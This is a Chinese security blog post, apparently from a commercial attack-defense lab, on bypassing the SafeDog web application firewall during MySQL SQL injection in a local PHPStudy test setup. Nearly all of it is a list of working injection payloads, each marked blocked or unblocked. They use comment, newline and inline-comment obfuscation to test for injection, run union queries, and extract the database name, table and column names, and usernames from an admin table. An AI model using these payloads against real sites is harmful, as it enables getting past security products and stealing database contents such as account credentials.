前言
在做项目中遇到各种各样waf,跟着本文系列一起学习bypass。
安装
环境:win+PHPstudy+安全狗
过程
安装phpstudy需要以系统模式启动,否则安全狗无法识别安装防护插件。
进入主题
判断注入:
and 1=1 拦截
and -1=-1拦截
and /*/ /-- /*/1=1 不拦截
2.order by:
order by 1 拦截
order/*//*/ by 1 不拦截
3.联合查询
and 1=2 union select 拦截
注释+换行符绕过
and /*/%0A*a*/1=2 union/*/ /-- /*/select 1,2 不拦截
4.爆库:
and /*/%0A*a*/1=2 union/*/ /-- /*/select%201,database() 拦截
and /*/%0A*a*/1=2 union/*/ /-- /*/select%201,database/*/ /-- /*/()不拦截
5.爆表:
用以上方法bypass绕过
/*!and*/ /*/%0A*a*/1=2 /**//**/union/*/ /-- /*/ /*/%0A*a*/select 1,table_name /*!from--/*information_schema.tables*/ /*//*/where table_schema=/*!database*//*/ /-- /*/() limit 0,1 不拦截
5.获取列名
%20/*!and*/%20/*/%0A*a*/1=2%20/**//**/union/*/%20/--%20/*/%20/*/%0A*a*/select%201,column_name%20/*!from--%0F/*%0Ainformation_schema.columns*/%20/*//*/where%20table_schema=/*!database*//*/%20/--%20/*/()%20limit%200,1 不拦截
6.获取字段:
union/*/%20/--%20/*/select%201,/*!username*/%20/*//*!--+*/from%20admin%20limit%201,1
总结
手法采用了大量注释+换行来达到bypass效果。
如文中有误请不吝指正
参考文献
https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI
本文作者:刑天攻防实验室
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/185166.html